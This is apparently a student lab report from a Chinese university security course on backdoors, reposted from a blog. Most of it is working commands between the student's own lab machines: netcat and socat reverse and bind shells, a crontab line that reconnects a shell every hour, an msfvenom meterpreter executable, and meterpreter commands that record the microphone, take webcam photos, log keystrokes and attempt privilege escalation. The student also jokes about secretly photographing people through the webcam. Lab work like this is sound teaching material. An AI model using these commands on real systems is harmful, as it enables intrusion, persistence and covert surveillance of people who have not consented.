20155302《網絡對抗》後門原理與實踐
實驗要求
1.使用netcat擷取主機操作Shell,cron啟動 (0.5分)
2.使用socat擷取主機操作Shell, 任務計劃啟動 (0.5分)
3.使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機并運作擷取主機Shell(0.5分)
4.使用MSF meterpreter(或其他軟體)生成擷取目标主機音頻、攝像頭、擊鍵記錄等内容,并嘗試提權 (2分)
5.可選加分内容:使用MSF生成shellcode,注入到實踐1中的pwn1中,擷取反彈連接配接Shell(1分)加分内容一并寫入本實驗報告
實驗内容
•使用nc實作win,mac,Linux間的後門連接配接
•meterpreter的應用
•MSF POST 子產品的應用
實驗過程(基本後門工具實踐)
1.Windows獲得Linux Shell
在windows下,打開CMD,使用
ipconfig
指令檢視本機IP
在Linux下,打開終端,使用
ifconfig
指令檢視虛拟機IP
去老師給的連結下下載下傳解壓ncat壓縮包,在cmd中進入ncat檔案夾中,使用
ncat.exe -l -p 5302
指令運作ncat.exe監聽5302端口。
在kali端,使用nc指令的-e選項,
nc windows_ip 5302(所設定的端口) -e /bin/sh
反向連接配接Windows主機的5302端口。
連接配接成功後就可以在Win的cmd視窗中輸入Linux的指令,此時已經擷取了Linux的shell。
2.Linux獲得Win shell
Linux中使用nc指令,
nc -l -p 5302
,監聽5302端口。
Windows反彈連接配接Linux使用
ncat.exe -e cmd.exe ip_of_linux 5302
然後,在kali端,就可以使用windows的cmd了。
3.使用netcat擷取主機操作Shell,cron啟動
在Windows中使用
ncat.exe -l 5302
指令監聽5302端口。
Linux在終端視窗使用``
nc Win的IP 端口号
指令去連接配接Win的5302端口。
用
crontab -e
指令編輯一條定時任務(輸入3,選vim.basic)
添加一行:
20 * * * * /bin/netcat 172.30.1.130 5302 -e /bin/sh
,(該指令是在每個小時的第20分鐘執行後面的指令)儲存并退出,配置生效,可以通過crontab -l來檢視。
到達你所設定的時間後,你就可以獲得了kali的shell并控制它。
4.使用socat擷取主機操作Shell, 任務計劃啟動
首先去老師的附件中下載下傳socat。
在Windows系統下,打開控制台->管理工具->任務計劃程式,建立任務,填寫任務名稱後,建立一個觸發器。
在操作中的程式或腳本裡選擇下載下傳的socat.exe的路徑,添加參數中填入
tcp-listen:5302 exec:cmd.exe,pty,stderr
,該指令把cmd綁定到5302端口,同時把cmd的Stderr複位到stdout。
任務建立後,右鍵它使任務運作。
然後在Kali環境下輸入指令
socat - tcp:172.30.1.130:5302
,這裡的第一個參數-代表标準的輸入輸出,第二個流連接配接到Windows主機的5302端口,此時可以發現已經成功獲得了一個cmd shell。
5. 使用MSF meterpreter生成可執行檔案,利用ncat或socat傳送到主機并運作擷取主機Shell
首先在kali裡面輸入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.130 LPORT=5302 -f exe > 20155302.exe
生成後門程式(LHOST=kali linux的IP)
通過nc指令将生成的後門程式傳送到Windows主機上
windows:
ncat.exe -l 5302 > 20155302.exe
kali:
nc 172.30.1.130 5302 < 20155302.exe
再在Kali上使用msfconsole指令進入msf控制台,使用監聽子產品,設定payload,設定反彈回連的IP和端口。
設定完成後,利用exploit,執行監聽,在windows中,利用
20155302.exe
運作2015302.exe。
此時Kali上已經獲得了Windows主機的連接配接,并且得到了遠端控制的shell。
6.使用MSF meterpreter生成擷取目标主機音頻、攝像頭、擊鍵記錄等内容,并嘗試提權
1.使用record_mic指令可以截獲一段音頻
2.用webcam_snap指令可以使用攝像頭進行拍照
3.使用webcam_stream指令可以使用攝像頭進行錄像
4.使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄
5.使用screenshot指令可以進行截屏
6.使用getuid指令檢視目前使用者,使用getsystem指令進行提權。但是由于環境問題顯示提權失敗,不知道為什麼。
基礎問題回答
(1)例舉你能想到的一個後門進入到你系統中的可能方式?
答:下載下傳并安裝某個程式,這個程式可以正常的并且完整的為我們提供服務,但是在開發改程式時可能會設計了一個後門,我們安裝程式的過程中也将該後門也裝入了我們的系統中。
2.例舉你知道的後門如何啟動起來(win及linux)的方式?
答:windows:實驗中做過的方式有直接輕按兩下開啟後門程式、通過Windows->控制台->管理工具啟動任務計劃程式、開機自啟動的後門、和其他程式捆綁運作的後門程式
linux:通過在cron中添加任務,定時執行、通過一些腳本啟動後門程式、通過和其他程式捆綁運作後門程式。
(3)Meterpreter有哪些給你映像深刻的功能?
控制靶機的攝像頭啦當然是,使用這個可以時時知道對面在幹什麼,還可以偷拍。。。雖然不是很正經,但是覺得很有趣很有用。。
(4)如何發現自己有系統有沒有被安裝後門?
1.使用專殺木馬的軟體
2.關閉本機不用的端口或隻允許指定的端口通路
實驗總結與體會
這次實驗是真滴很有趣,雖然實用性不是很大,因為有現代先進的防毒軟體的存在,但是學會了一些基本原理以及當黑客的快感,第一次覺得自己學的真的是資訊安全了。
轉載于:https://www.cnblogs.com/STILLlover521/p/8684430.html